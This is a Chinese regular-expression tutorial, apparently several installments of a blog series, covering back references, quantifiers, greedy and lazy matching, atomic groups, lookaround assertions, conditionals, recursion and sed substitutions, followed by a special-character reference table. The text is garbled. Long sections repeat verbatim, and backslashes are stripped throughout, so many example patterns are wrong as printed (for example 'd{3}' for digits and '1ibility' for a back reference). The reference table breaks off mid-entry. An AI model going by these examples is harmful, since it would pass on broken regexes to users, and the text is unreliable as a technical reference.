前面介绍反斜线作用时,已经提到它的一个作用就是表示逆向引用,当字符类之外的反斜线后跟一个大于0的十进制数时,它很有可能是一个逆向引用。它的含 义正如它的名称如言,它表示对它出现之前已经捕获的子模式的引用。这个数字代表了它引用的左括号在模式中出现的次序,我们在介绍子模式时已经看到过逆向引 用的一个例子,那里的过“1”,“2”,“3”分别表示所捕获的第一,第二,和第三个小括号定义的子模式的内容。
值得注意的是,当反斜线后的数字小于10时,可以确定此为一个逆向引用,这样,这个逆向引用就可以出现在之前有相应数目的左圆括号被捕获前而不会出现 混淆,只有整个模式能提供那么多的捕获子模式,就不会报错。说起来似乎很混乱,还是让我们来看下面这个例子。把介绍子模子时举的例子拿来修改一下,前面讲 过字符串 "the red king" 来和模式 /the ((red|white) (king|queen))/匹配,捕获的子串为 "red king","red" 以及 "king",并被计为 1,2 和 3 ,现在把字符串,修改为" king,the red king",模式改为/3,the ((red|white) (king|queen))/,这个模式应该也是可以匹配的。不过,并非所有的正则表达式工具都支持这种用法,安全的做法是在相应序号的左括号之后使用与 之相关的逆向引用。
需要注意的另一点是逆向引用的值是在目标字符串中实际捕获的符合子模式的字符串片段而非该子模式本本身。例如/ (sens|respons)e and 1ibility/会匹配“sense and sensibility” 和 “response and responsibility”,但不会是 "sense and responsibility"。当被逆向引用的子模式后面有量词从而被重复匹配了多次,逆向引用的值会以最后一次匹配的值为准。例如/([abc]) {3}/匹配字符串“abc”时,逆向引用“1”的值将是最后一次匹配的结果“c”。
命名子模式(named subpattern)
一些工具(例如Python)可以为逆向引用命名,从而定义出命名子模式。在Python中对正则表达式的使用是以函数或方法调用的格式,语法与这里举的例子有较大差别。有兴趣的朋友可以参看一下自己使用的工具来看看是否支持命名子模式。
非捕获子模式(non-capturing subpatterns)
用一对括号同时完成上面提到的子模式的两个功能有时会出现一些问题,例如,由于逆向引用的数目是有限的(通常最大不超过9),而且经常会遇到无需捕获 的子模式定义。这时,可以在开始的括号后加上问号和冒号来表示这个子模式无需捕获,就向下面这样(?:red|white) (king|queen))。
如果将“the white queen”作为模式匹配的目标字符串,则捕获的字串有“white queen”和“queen”,分别作为“1”和“2”,white虽然符合子模式“(?:red|white)”,但并不被捕获。
我们前面已经介绍过用括号与问号表示模式修正符的方法,为方便起见,如果需要在非捕获子模式中插入模式修正符,可以把它直接放在问号和冒号之间,例如,下面两个模式是等效的。
/(?i:saturday|sunday)/和/(?:(?i)saturday|sunday)/。
逆向引用(Back references)
前面介绍反斜线作用时,已经提到它的一个作用就是表示逆向引用,当字符类之外的反斜线后跟一个大于0的十进制数时,它很有可能是一个逆向引用。它的含 义正如它的名称如言,它表示对它出现之前已经捕获的子模式的引用。这个数字代表了它引用的左括号在模式中出现的次序,我们在介绍子模式时已经看到过逆向引 用的一个例子,那里的过“1”,“2”,“3”分别表示所捕获的第一,第二,和第三个小括号定义的子模式的内容。
值得注意的是,当反斜线后的数字小于10时,可以确定此为一个逆向引用,这样,这个逆向引用就可以出现在之前有相应数目的左圆括号被捕获前而不会出现 混淆,只有整个模式能提供那么多的捕获子模式,就不会报错。说起来似乎很混乱,还是让我们来看下面这个例子。把介绍子模子时举的例子拿来修改一下,前面讲 过字符串 "the red king" 来和模式 /the ((red|white) (king|queen))/匹配,捕获的子串为 "red king","red" 以及 "king",并被计为 1,2 和 3 ,现在把字符串,修改为" king,the red king",模式改为/3,the ((red|white) (king|queen))/,这个模式应该也是可以匹配的。不过,并非所有的正则表达式工具都支持这种用法,安全的做法是在相应序号的左括号之后使用与 之相关的逆向引用。
需要注意的另一点是逆向引用的值是在目标字符串中实际捕获的符合子模式的字符串片段而非该子模式本本身。例如/ (sens|respons)e and 1ibility/会匹配“sense and sensibility” 和 “response and responsibility”,但不会是 "sense and responsibility"。当被逆向引用的子模式后面有量词从而被重复匹配了多次,逆向引用的值会以最后一次匹配的值为准。例如/([abc]) {3}/匹配字符串“abc”时,逆向引用“1”的值将是最后一次匹配的结果“c”。
命名子模式(named subpattern)
一些工具(例如Python)可以为逆向引用命名,从而定义出命名子模式。在Python中对正则表达式的使用是以函数或方法调用的格式,语法与这里举的例子有较大差别。有兴趣的朋友可以参看一下自己使用的工具来看看是否支持命名子模式。
重复(Repetition)和量词(quantifiers)
在前面介绍逆向引用的部分里我们已经接触到了量词(quantifiers)的概念,例如前面的例子/([abc]){3}/表示三个连续的字符,每 个字符都必然是 “abc”这三个字符中的一个。在这个模式里,{3}就属于量词。它表示一个模式需要重复匹配(repetition)的数目。
量词可以放在下面这些项目之后:
?●单个字符(有可能是被转义的单个字符,如xhh)
?●“.”元字符
?● 由方括号表示的字符类
?● 逆向引用
?●由小括号定义的子模式(除非它是个断言,我们会在以后介绍)
最通用的量词使用形式是用花括号括起的两个由逗号分隔的数字,如这样的格式{min,max},例如,/z{2,4}/ 可以匹配 "zz", "zzz", 或者 "zzzz",花括号中的最大值以及前面的逗号可以省略,例如/d{3,}/可以匹配三个以上的数字,数字的数目没有上限,而/d{3}/(注意,没有逗 号)则精确的匹配3个数字。当花括号出现在不允许量词的位置或者语法与前面提到的不符时,这里它仅仅代表花括号字符本身而不再具有特殊的含义。例如{, 6}不是量词,它仅仅代表这四个字符本身的含义。
为了方便,三个最常用的量词有它们的单字符缩写形式,它们的的含义如下表:
* 相当于 {0,}
+ 相当于 {1,}
? 相当于 {0,1}
这也是以上三个元字符做为量词使用含义。
在使用量词特别是没有上限限制的量词时,应该特别注意不要构成无限循环,例如/(a?)*/,在有的正则表达式工具里。这会形成一个编译错,不过有的工具却允许这种结构,但不能保证各种工具都可以很好的处理这种结构。
重复(Repetition)和量词(quantifiers)
在前面介绍逆向引用的部分里我们已经接触到了量词(quantifiers)的概念,例如前面的例子/([abc]){3}/表示三个连续的字符,每 个字符都必然是 “abc”这三个字符中的一个。在这个模式里,{3}就属于量词。它表示一个模式需要重复匹配(repetition)的数目。
量词可以放在下面这些项目之后:
?●单个字符(有可能是被转义的单个字符,如xhh)
?●“.”元字符
?● 由方括号表示的字符类
?● 逆向引用
?●由小括号定义的子模式(除非它是个断言,我们会在以后介绍)
最通用的量词使用形式是用花括号括起的两个由逗号分隔的数字,如这样的格式{min,max},例如,/z{2,4}/ 可以匹配 "zz", "zzz", 或者 "zzzz",花括号中的最大值以及前面的逗号可以省略,例如/d{3,}/可以匹配三个以上的数字,数字的数目没有上限,而/d{3}/(注意,没有逗 号)则精确的匹配3个数字。当花括号出现在不允许量词的位置或者语法与前面提到的不符时,这里它仅仅代表花括号字符本身而不再具有特殊的含义。例如{, 6}不是量词,它仅仅代表这四个字符本身的含义。
为了方便,三个最常用的量词有它们的单字符缩写形式,它们的的含义如下表:
* 相当于 {0,}
+ 相当于 {1,}
? 相当于 {0,1}
这也是以上三个元字符做为量词使用含义。
在使用量词特别是没有上限限制的量词时,应该特别注意不要构成无限循环,例如/(a?)*/,在有的正则表达式工具里。这会形成一个编译错,不过有的工具却允许这种结构,但不能保证各种工具都可以很好的处理这种结构。
量词匹配的“greedy”与“ungreedy”
在使用带量词的模式时,我们常会发现对同一模式而言,同一个目标字符串可以有多种匹配方式。例如/d{0,1}d/,可以匹配两个或三个十进制数字, 如果目标字符串是123,当量词取下限0里,它匹配“12”,当量词取上限1里,它匹配“123”整个字符。这两种匹配结果都是正确的,如果我们取它的子 模式/(d{0,1}d)/,则匹配的结果1到底是“12”还是“123”?
实际的运行结果一般会是后者,因为默认情况下,大多数正则表达式工具的匹配是按“greedy”原则匹配的。“greedy”单词的中的含义是“贪吃 的, 贪婪的”的意思,它的行为也如此单词的含义,所谓greedy匹配意指在量词限制范围内,只要能保持后续模式的匹配,匹配总是尽可能的重复下去,直到不匹 配的情况发生为止。为便于理解,我们看下面这个简单的例子。
/(d{1,5})d/匹配“12345”这个字符串,这个模式表示在1到5个数字后面跟上一个数字,量词范围从1到5,当它的值在1-4时,整个模 式都是匹配的,1的值可以是“1”,“12”,“123”,“1234”,而在greedy匹配的情况下,它取匹配时的量词最大值,因此最终匹配的结果 是”1234”。
在大多数情况下,这就是我们想要的结果,但情况并不总这样。例如,我们希望用下面这个模式提取出c语言的注释部分(在c语言中,注释语句放在字符串 /*和*/之间)。我们使用的正则表达式是/*.**/,但匹配的结果却完全和需要的不同。当正则表达式解析到“/*”这后的“.*”时,因为“.”可以 代表任意字符,这也包含了其后需要匹配的“*/”,在量词的作用下,这个匹配将一直进行下去,超过下一个“*”/直到文本的结束,这显然不是我们需要的结 果。
为了完成如上例我们想要的那种匹配,正则表达式引入了ungreedy匹配方法,与greedy匹配相反,在满足整个模式匹配的前提下,它总是取最小 的量词数目结果。Ungreedy匹配用在量词后面加上问号“?”来表示。例如在匹配C语言的注释时,我们把正则表达式写成如下形式:/*.*?*/,在 量词“*”后加上问号就可以达成想要的结果。还有前面那个例子用/(d{1,5})d/匹配“12345”这个字符串,如果改写为ungreedy模式向 这样/(d{1,5}?)d/,、1的值将为1。
上面的解释也许有些不准确,量词后的问号的作用实际上是反转当前的正则表达式的greedy与ungreedy行为。你可以通过模式修正符“U”将正则表达式设成ungreedy模式然后在模式中通过量词后的问号将之反转为greedy。
一次性子模式(Once-only subpatterns)
关于量词的另一个有趣的话题是一次性子模式(Once-only subpatterns)。要理解它的概念需要先了解一下含有量词的正则表达式的匹配过程。我们这里举个例子。
现在,让我们用模式/d+foo/来匹配字符串“123456bar”,当然,它的结果是没有匹配。但正则表达式引擎是如何工作的呢?它先分析前面的 d+,这代表一个以上的数字,然后检查目标字符串的对应位置的第一个字符“1”,符合模式,然后根据量词重复这个模式对字符串进行匹配直到 “123456”始终符合“d+”模式,接着它在目标字符串中遇到字符“b”无法与“d+”匹配,于是查看“d+”的后续模式“foo”,与目标字符串的 后续部分“bar”无法匹配,这时,有趣的事情出现了,解释引擎会对前面已经解析过的“d+”模式进行回溯,将量词数目减少一,看剩余部分能否匹配,此时 “d+”的值改为“12345”,然后解释引擎看目标字符串剩余的部分“6bar”能否与剩余的模式“foo”相匹配,如果不行,就把量词数再减一,直到 达到最小的量词限制,如果仍无法匹配,则表明目标字符串无法匹配,返回无法匹配的结果。
现在,我们就可以来接触一次性子模式了。所谓一次性子模式就是定义在正则表达式解析时不需要上述回溯过程的子模式。它用左圆括号后面的问号和小于号来表示,向这样(?>)。如果将上面提到的例子改为一次性子模式,可以这样书写:
/(?>d)+foo/,这时,当解析器遇到后面不匹配的bar时,会立即返回不匹配的结果,而不会进行前面提到的回溯过程。
需要了解的是,一次性子模式属于非捕获子模式,它的匹配结果不能被逆向引用。
当一个没有设定重复上限的子模式中包含了同样没有设定重复上限的模式时,使用一次性子模式是唯一可以避免让你的程序陷入长时间等待的方法。例如你用 “/(D+|<d+>)*[!?]/”这个模式去匹配一长串的a字符,向这样 “aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa”,在返回最终无匹配的结果前,你会等待很长的一段时间。这个模式表示一串非数字 字符或者用尖括号括着的一串数字后跟随着叹号或者问号,把这段字符串分成两个重复的部分会有很多种分法,而无论是子模式本身还是子模式之内的量词的各可能 值都要经过逐一测试,这将使最终的运算量达到一个很大的程度。这样,你将在电脑前等待相当长的时间才会看到结果。而如果用一次性子模式来改写刚才的模式, 改成这样/ ((?>D+)|<d+>)*[!?]/,你就可以很快得到运算的结果。
正则表达式快速入门(三)
在上文里,我们介绍了正则表达式的子模式,逆向引用和量词,在这篇文章里,我们将重点介绍正则表达式中的断言(Assertions)。
断言(Assertions)
断言(Assertions)是在目标字符串的当前匹配位置进行的一种测试但这种测试并不占用目标字符串,也即不会移动模式在目标字符串中的当前匹配位置。
读起来似乎有点拗口,我们还是举几个简单的例子。
两个最常见的断言是元字符“^”和“$”,它们检查匹配模式是否出现在行首或行尾。
我们来看这个模式/^ddd$/,试着用它来匹配目标字符串“123”。“ddd”表示三个数字字符,匹配了目标字符串的三个字符,而模式中的^和$分别表示这三个字符同时出现在行首和行尾,而它们本身并不与目标字符串中的任何字符相对应。
其它还有一些简单的断言b, B, A, Z, z,它们都以反斜线开头,前面我们已经介绍过反斜线的这个用法。这几个断言的含义如下表。
断言 含义
b 字分界线
B 非字分界线
A 目标的开头(独立于多行模式)
Z 目标的结尾或位于结尾的换行符前(独立于多行模式)
z 目标的结尾(独立于多行模式)
G 目标中的第一个匹配位置
注意这些断言不能出现在字符类中,如果出现了也是其它的含义,例如b在字符类中表示反斜线字符0x08。
前面介绍的这些断言的测试都是一些基于当前位置的测试,断言还支持更多复杂的测试条件。更复杂的断言以子模式方式来表示,它包括前向断言(Lookahead assertions)和后向断言(Lookbehind assertions)。
前向断言(Lookahead assertions)
前向断言从目标字符串的当前位置向前测试断言条件是否成立。前向断言又可分为前向肯定断言和前向否定断言,分别用(?=和{?!表示。例如模式/ w+(?=;)/用来表示一串文本字符后面会有一个分号,但是这个分号并不包括在匹配结果中。一件有趣的事看起来差不多的模式/ (?=;)w+/并不是表示一串前面不是分号的alpha字符串,事实上,不论这串alpha字符的前面是否是一个分号它总是匹配的,要完成这个功能需要 我们下面提到的后向断言(Lookbehind assertions)。
后向断言(Lookbehind assertions)
后向断言分别用(?<=和(?<!表示肯定的后向断言与否定后向断言。例如,/ (?<!foo)bar/将寻找一个前面不是foo的bar字符串。一般而言,后向断言使用的子模式需要有确定的长度值,否则会产生一个编译错误。
使用后向断言与一次性子模式搭配使用可以有效的文本的结束部分进行匹配,这里来看一下例子。
考虑一下如果用/abcd$/这样一个简单的模式来匹配一长段以abcd结尾的文本,因为模式的匹配过程是从左向右进行的,正则表达式引擎将在文本中 寻找每一个a字符并尝试匹配剩余的模式,如果在这长段文本里仅好有不少的a字符,这样做明显是非常低效的,而如果把以上模式换成为样/^.*abcd$ /,这时前面的“^.*”部分将匹配整个文本,然后它发现下一个模式a无法匹配,这时会发生前面提到过的回溯过程,解析器会逐次缩短“^.*”匹配的字符 长度从右向左逐次查找剩余的子模式,也要产生多次的尝试过程。现在,我们用一次性子模式与后向断言重写所用的模式,改为/^(?>.*)(? <=abcd)/,这时,一次性子模式一次匹配了整段文本,然后用后向断言检查前面四个字符是否为abcd,只需要一次检测就可以立刻确定整个模式 是否匹配。在遇到需要匹配一个很长的文本时,这种方法可以非常显著的提高处理效率。
一个模式中可以包含多个相继的断言,断言也可以嵌套。另外,断言使用的子模式也是非捕获的,不能被逆向引用。
断言的一个重要应用领域就是做为条件子模式的条件。那什么是条件子模式呢?
条件子模式(Conditional subpatterns)
正则表达式允许在模式中根据不同的条件使用不同的匹配子模式。也就是条件子模式(Conditional subpatterns)。它的格式如下?(condition)yes-pattern)或者 (?(condition)yes-pattern|no-pattern)。如果条件满足,采用yes-pattern,否则,采用no- pattern(如果在模式中提供了话)。
条件子模式中的条件有两种,一种是断言结果,另一种是看是否捕获一个前面提供的子模式。
如果在表示条件的圆括号里的内容是一个数字,它表示当此数字代表的子模式被成功匹配时条件为真。看看下面这个例子,/( ( )? [^()]+ (?(1) ) )/x,(注意“x”模式修正符表示忽略字符类外的空白字符和#符号之后的内容)。
这个模式的第一部分“( ( )?”匹配了一个可选的左图括号“(”,第二部分“[^()]+”匹配了一个以上的非圆括号字符,最后一部分“(?(1) ) )”是个条件子模式,表示如果捕获到1也即那个可选的左圆括号,第三部分应该会出现一个右圆括号“)”。
如果在表示条件的圆括号内是一个“R”字符,表示在这个模式或子模式被递归调用时条件为真,在递归调用的顶层,这个条件为假。关于正则表达式中的递归,我们会在后面的部分专题介绍。
如果条件不是一个数字或R字符,则它必需是一个断言。断言可以是肯定或否定的前身或后向断言。让我们看下面这个例子。
/(?(?=[^a-z]*[a-z])
d{2}-[a-z]{3}-d{2} | d{2}-d{2}-d{2} )/x
为了让这个正则表达式更容易阅读,我们特意采用了x模式修正符,这样我们可以在用模式中加入空格对符式进行格式上的分隔并分行表示而不影响模式的解析。
by clin003 from:http://clin003.com/或http://blog.csdn.net/cin003/
第一行的条件子模式使用了一个肯定的前向断言,表示一串可选的非小写字母后面跟随着一个小写字母。换句话说,它查看目标字符串是否至少包含一个小写字 母,如果是,它用“|”前的模式对目标进行匹配,看目标是否为看目标是否为两个数字-三个小写字母-两个数字这种格式,否则,用“|”来匹配目标,看目标 字符串是否为由“-”分隔的三段二位十进制数字。
正则表达式中的注释
为了让正则表达式更容易阅读,可以在其中加入注释语句。通常注释由左圆括号和井号——“(#“开始,当遇到下一个右圆括号”)“结束。注释是禁止嵌套的。
如果设定了“x”模式修正符,任何字符类之外(也即[]之外)的井号(#)和下一个新行标记之间的部分也被作为注释看待。
正则表达式快速入门(四)
在上一篇文章里,我们介绍了正则表达式中断言相关的一些概念,在本文里,我们会介绍正则表达式中递归的运用与利用正则表达式修改目标字符串。
正则表达式中的递归
接触过程序的朋友可能都遇到过成对的各种括号吧,这些括号常常相互嵌套,而且嵌套的层次数目无法确定。试想一下如果想提取一段程序里用括号括起的一段代码,这里面很可能包含了层次数目不定的其它括号对,用正则表达式该如何完成?
在Perl 5.6之前这的确有点困难,不过从Perl 5.6之后,引入了递归正则表达式,这个问题得到了解决。通常在正则表达式里用“(?R)”表示一个对自己的引用,下面让我们看看用什么正则表达式来解决刚才提出的问题。
/( ( (?>[^()]+) | (?R) )* )/x
现在让我们来分析这个模式的含义,这里使用了“x”模式修正符,以便可以在模式中加入空格以方便阅读。
模式的开头是匹配第一个左圆括号,然后我们需要捕获的子模式,注意,字模式后面跟了量词“*”,表示此模式可以重复0到多次。最后是一个结束圆括号。 现在我们分析子模式( (?>[^()]+) | (?R) )的内容。这是一个分支子模式,表示模式可以有两种情况,第一种是(?>[^()]+),这是一个一次性子模式,代表一个以上的非括号字符,另一种 情况是| (?R),也即对正则表达式自己的递归调用——( ( (?>[^()]+) | (?R) )* ),又寻找一个左圆括号,开始查找一对嵌套的圆括号包含的内容。
分析到这里,这个正则表达式的含义已经基本清楚,但你注意到没有,这里为什么要使用一次性子模式(?>[^()]+)来查找非括号字符串?
事实上,由于递归的层次是无限的,这种处理非常必要,特别是遇到不匹配的字符串时,它不会让你陷入长时间的等待。考虑一下下面这个目标字符串,
(aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa()
在得出不匹配的最终结果前,如果不使用一次性子模式,解析器将尝试每一种可能的方法来分割目标字符串,这将浪费大量的时间。
用正则表达式修改目标
并非所有的正则表达式工具都允许你修改目标字符串,它们中的一些仅仅使用正则表达式来查找匹配指定模式的字符串,在Linux中,最为广泛使用的支持 正则表达式的工具就是grep命令,这是一个专门用来查找的工具,再就是一些文本编辑器工具,它们有的允许使用正则表达式替换,有的则不允许,这需要查看 你使用的工具的在线手册。
对于那些允许你使用正则表达式来修改目标字符串的工具中,它们之间的一些不同你必然放在心上:
这些不同首先表现在替换的具体形式上,有的是以对话框的形式分别让你输入需要查找的模式和被替换的内容,有些则使用命令使界面通过定界符来分隔匹配的模式与需要替换的内容,对于一些编程语言工具,它们通常通过函数的不同参数来分别定义需要匹配的模式与替换的内容。
另一个需要注意的不同是这些工具具体修改的对象。大多数基于Linux的命令行工具一般是通过标准输出或者管道来修改缓存的内容而非直接修改磁盘上存储的文件,而文本编辑器工具或编程语言通常会直接修改目标文件。
我们下面用Linux下sed命令的格式来举几个正则表达式的例子:
模式:s/cat/dog/g
输入:wild dogs, bobcats, lions, and other wild cats
输出:wild dogs, bobdogs, lions, and other wild dogs
模式:s/[a-z]+i[a-z]*/nice/g
输入:wild dogs, bobcats, lions, and other wild cats
输出: nice dogs, bobcats, nice, and other nice cats
当我们使用模式进行替换操作时,目标字符串中所有匹配模式的字符串都将被替换。
下面再举一个使用逆向引用进行替换的例子:
模式:s/([A-Z])([0-9]{2,4}) /2:1 /g
输入: A37 B4 C107 D54112 E1103 XXX
输出: 37:A B4 107:C D54112 1103:E XXX
前面已经介绍过默认情况下的匹配一般是greedy的,这常会使实际匹配的部分大于你希望匹配的内容,特别是在进行替换操作时这将更加危险,因为如果 你在错误匹配的情况下执行了一次替换操作,实际上你是删除了目标中的有效内容,特别是当这种操作面向文件时造成的危害就更大了。因此,牢记一个不严格的字 符类加上一个不严格的量词足以造成不可挽回的后果,执行类似操作前一定要多测试一下不同的目标字符串,尽可能避免这种情况的发生。
在本教程的下一篇文章里,我们会介绍一款可以方便进行正则表达式学习的工具和一些正则表达式编写的思路。
正则表达式快速入门(五)
在上一篇文章里,我们介绍了正则表达式中的递归与替换,现在让我们接触一个学习正则表达式时方便测试使用的工具,并介绍一些正则表达式的编写思路。
一个学习正则表达式的便捷工具
学习正则表达式最好的方法当然是实践,不过支持正则表达式的工具虽多,但如果仅仅用来做练习却不是很方便。
这里我向一家推荐一款专门的正则表达式编写测试工具,PHPEdit公司的Regular Expression Editor工具。这是一个免费软件,主要用来调试PHP使用的Perl兼容正则表达式函数。使用它可以方便的输入目标字符串和正则表达式,并实时看到匹 配的结果。可以到它的下载网页去下载这个工具。
程序的界面非常简明,不过使用中发现,它的一些功能使用起来好像有问题,只有preg_match_all和preg_replace功能正常,另外在匹配模式输入框中,不要加模式定界符,程序好像把该输入框中的全部内容都作为模式来解析。
好在做为一个正则表达式的练习工具,它的功能是足够了,下面是它的运行界面。
程序运行界面
文中提到的各个例子都可以在里面进行测试,在最上面的框里输入模式,把目标字符串写进中间的输入框,点击“run the regxwp”按钮可以在下面得到匹配结果。
正则表达式的编写思路
一个避免过多匹配的小技巧
前面我们已经多此谈到书写不合理的正则表达式引起过多匹配的问题,现在的问题是,如何可以尽量避免类似的情况发生。这里有个小小的技巧。
如果你发现你定制模式匹配了过多的结果,一个好的方法是换个思路,与其考虑我的模式下一步需要匹配什么,不如考虑我的模式下一步需要避免匹配什么。我们可以用元字答“^”和字符类很容易的达成这种效果,这常常可以得到更精确的匹配。
为了说明这种思路的好处我们先来举一个与正则表达式无关的例子,考虑这样一个问题,你把一个骰子一次抛出6的概率是六分之一,如果让你掷六次,掷出一个6的概率是多少呢?
可能有人会这么算,一次的概率是1/6,六次是就是6个1/6,加起来等于1。这个结果明显是错的,虽然你掷了六次,但肯定不能保证必然会掷出一个6。从正向的思路解这道题看上去有点难。
如果我们换个思路,解决的方法就明确多了。我们可以把这个题的问法改成这样,如果让你掷6次骰子,每一次都掷不出6的概率是多少?这个问题就好解多 了,根据概率的乘法原理,每一次掷出不是6的点数的概率是5/6,而6次中每一次都不是6的概率是5/6的6次方,大概等于33%的样子,然后用1减去这 个数字就可以得到我们需要的答案。
你可以把模式中每部分的匹配看作掷一次骰子的过程,每一部分的匹配概率与总匹配概率的情况与我们上面这个例子非常相似。
如何提高正则表达式的解析效率
对同样匹配内容的正则表达式而言,一些模式往往比另外一些模式更有效率。举一个简单的例子,使用字符类“[aeiou]”会比使用分支选择型模式“(a|e|i|o|u).”更有效,一般而言,使用尽可能简单和基本的模式通过会得到更高的效率。
应该尽可能的慎用相互嵌套的无限重复量词,当遇到不匹配的目标字符串时,对字符串的解析有可能花掉很可观的时间。比如下面这个模式片断“(a+) *”,当遇到不匹配的目标字符串“aaaa”时,解析器会对它尝试33种不同的匹配方法,这个数目会随不匹配字符串长度的增加而极快的增长。
一些正则表达式工具对一些特定的模式匹配进行了优化以提高效率,了解你使用的正则表达式工作做过些什么优化并尽可能利用经过优化的模式可以大大提高你 的正则表达式执行效率。例如,PHP对形如/a+)*b /这样的模式的解析进行了优化,当模式结尾是一个确定的字符时,解析器会先查找目标的结尾是否符合模式,如果否则立刻返回失败的匹配结果并停止解析。如果 将上面的样式改为“(a+)*d”时,因为结尾不再是一个确定的字符,此模式会按正常的过程解析。如果你想看一下两者效果的差异,你在我们前面提到的工具 中,把目标字符串设置成25个小写的a字符,然后分别测试两个模式,前者立刻就结束了,而后者需要等待约一秒(笔者使用的是XP1700+处理器)。
除了尽可能利用经过优化的模式,对一些模式进行重新构造也可以大大提高效率。我们在介绍后向断言时介绍过的那个利用后向断言结合一次性子模式匹配结尾的字符的方法就是一个很好的例子。
这里我们准备结束这个教程,由于篇幅和本人水平的限制文中可能会有很多疏漏,还要请求大家谅解。对正则表达式介绍最全面的可能还是Perl相关的一些 文档和著作,如果想对正则表达式进行更深入的了解可以参看Jeffrey Friedl 写的“Mastering Regular Expressions”一书,里面有很多例子。不过我觉得在了解正则表达式基本概念后,还是仔细读一下自己经常使用的相关工具里的正则表达式相关部分更 实用一些,最后,还是那句话,实践出真知,希望大家在不断实践中更好的掌握正则表达式的使用。
正则表达式中的特殊字符
转自:http://www.phpe.net/articles/151.shtml
字符 描述
将下一个字符标记为一个特殊字符、或一个原义字符、或一个后向引用、或一个八进制转义符。例如,'n' 匹配字符 "n"。'n' 匹配一个换行符。序列 '' 匹配 "" 而 "(" 则匹配 "("。
^
匹配输入字符串的开始位置。如果设置了 RegExp 对象的 Multiline 属性,^ 也匹配 'n' 或 'r' 之后的位置。
$
匹配输入字符串的结束位置。如果设置了RegExp 对象的 Multiline 属性,$ 也匹配 'n' 或 'r' 之前的位置。
*
匹配前面的子表达式零次或多次。例如,zo* 能匹配 "z" 以及 "zoo"。 * 等价于{0,}。
+ 匹配前面的子表达式一次或多次。例如,'zo+' 能匹配 "zo" 以及 "zoo",但不能匹配 "z"。+ 等价于 {1,}。
?
匹配前面的子表达式零次或一次。例如,"do(es)?" 可以匹配 "do" 或 "does" 中的"do" 。? 等价于 {0,1}。
{n}
n 是一个非负整数。匹配确定的 n 次。例如,'o{2}' 不能匹配 "Bob" 中的 'o',但是能匹配 "food" 中的两个 o。
{n,}
n 是一个非负整数。至少匹配n 次。例如,'o{2,}' 不能匹配 "Bob" 中的 'o',但能匹配 "foooood" 中的所有 o。'o{1,}' 等价于 'o+'。'o{0,}' 则等价于 'o*'。
{n,m}
m 和 n 均为非负整数,其中n <= m。最少匹配 n 次且最多匹配 m 次。刘, "o{1,3}" 将匹配 "fooooood" 中的前三个 o。'o{0,1}' 等价于 'o?'。请注意在逗号和两个数之间不能有空格。
?
当该字符紧跟在任何一个其他限制符 (*, +, ?, {n}, {n,}, {n,m}) 后面时,匹配模式是非贪婪的。非贪婪模式尽可能少的匹配所搜索的字符串,而默认的贪婪模式则尽可能多的匹配所搜索的字符串。例如,对于字符串 "oooo",'o+?' 将匹配单个 "o",而 'o+' 将匹配所有 'o'。
.
匹配除 "n" 之外的任何单个字符。要匹配包括 'n' 在内的任何字符,请使用象 '[.n]' 的模式。
(pattern)
匹配pattern 并获取这一匹配。所获取的匹配可以从产生的 Matches 集合得到,在VBScript 中使用 SubMatches 集合,在JScript 中则使用 {CONTENT}… 属性。要匹配圆括号字符,请使用 '(' 或 ')'。
(?:pattern)
匹配 pattern 但不获取匹配结果,也就是说这是一个非获取匹配,不进行存储供以后使用。这在使用 "或" 字符 (|) 来组合一个模式的各个部分是很有用。例如, 'industr(?:y|ies) 就是一个比 'industry|industries' 更简略的表达式。
(?=pattern)
正向预查,在任何匹配 pattern 的字符串开始处匹配查找字符串。这是一个非获取匹配,也就是说,该匹配不需要获取供以后使用。例如, 'Windows (?=95|98|NT|2000)' 能匹配 "Windows 2000" 中的 "Windows" ,但不能匹配 "Windows 3.1" 中的 "Windows"。预查不消耗字符,也就是说,在一个匹配发生后,在最后一次匹配之后立即开始下一次匹配的搜索,而不是从包含预查的字符之后开始。
(?!pattern)
负向预查,在任何不匹配Negative lookahead matches the search string at any point where a string not matching pattern 的字符串开始处匹配查找字符串。这是一个非获取匹配,也就是说,该匹配不需要获取供以后使用。例如'Windows (?!95|98|NT|2000)' 能匹配 "Windows 3.1" 中的 "Windows",但不能匹配 "Windows 2000" 中的 "Windows"。预查不消耗字符,也就是说,在一个匹配发生后,在最后一次匹配之后立即开始下一次匹配的搜索,而不是从包含预查的字符之后开始
x|y
匹配 x 或 y。例如,'z|food' 能匹配 "z" 或 "food"。'(z|f)ood' 则匹配 "zood" 或 "food"。
[xyz]
字符集合。匹配所包含的任意一个字符。例如, '[abc]' 可以匹配 "plain" 中的 'a'。
[^xyz]
负值字符集合。匹配未包含的任意字符。例如, '[^abc]' 可以匹配 "plain" 中的'p'。
[a-z]
字符范围。匹配指定范围内的任意字符。例如,'[a-z]' 可以匹配 'a' 到 'z' 范围内的任意小写字母字符。
[^a-z]
负值字符范围。匹配任何不在指定范围内的任意字符。例如,'[^a-z]' 可以匹配任何不在 'a' 到 'z' 范围内的任意字符。
b
匹配一个单词边界,也就是指单词和空格间的位置。例如, 'erb' 可以匹配"never" 中的 'er',但不能匹配 "verb" 中的 'er'。
B
匹配非单词边界。'erB' 能匹配 "verb" 中的 'er',但不能匹配 "never" 中的 'er'。
cx
匹配由x指明的控制字符。例如, cM 匹配一个 Control-M 或回车符。 x 的值必须为 A-Z 或 a-z 之一。否则,将 c 视为一个原义的 'c' 字符。
d
匹配一个数字字符。等价于 [0-9]。
D
匹配一个非数字字符。等价于 [^0-9]。
f
匹配一个换页符。等价于 x0c 和 cL。
n
匹配一个换行符。等价于 x0a 和 cJ。
r
匹配一个回车符。等价于 x0d 和 cM。
s
匹配任何空白字符,包括空格、制表符、换页符等等。等价于 [ fnrtv]。
S
匹配任何非空白字符。等价于 [^ fnrtv]。
t
匹配一个制表符。等价于 x09 和 cI。
v
匹配一个垂直制表符。等价于 x0b 和 cK。
w
匹配包括下划线的任何单词字符。等价于'[A-Za-z0-9_]'。
W
匹配任何非单词字符。等价于 '[^A-Za-z0-9_]'。
xn
匹配 n,其中 n 为十六进制转义值。十六进制转义值必须为确定的两个数字长。例如, 'x41' 匹配 "A"。'x041' 则等价于 'x04' & "1"。正则表达式中可以使用 ASCII 编码。.
num
匹配 num,其中 num 是一个正整数。对所获取的匹配的引用。例如,'(.)' 匹配两个连续的相同字符。
n
标识一个八进制转义值或一个后向引用。如果 n 之前至少 n 个获取的子表达式,则 n 为后向引用。否则,如果 n 为八进制数字 (0-7),则 n 为一个八进制转义值。
nm
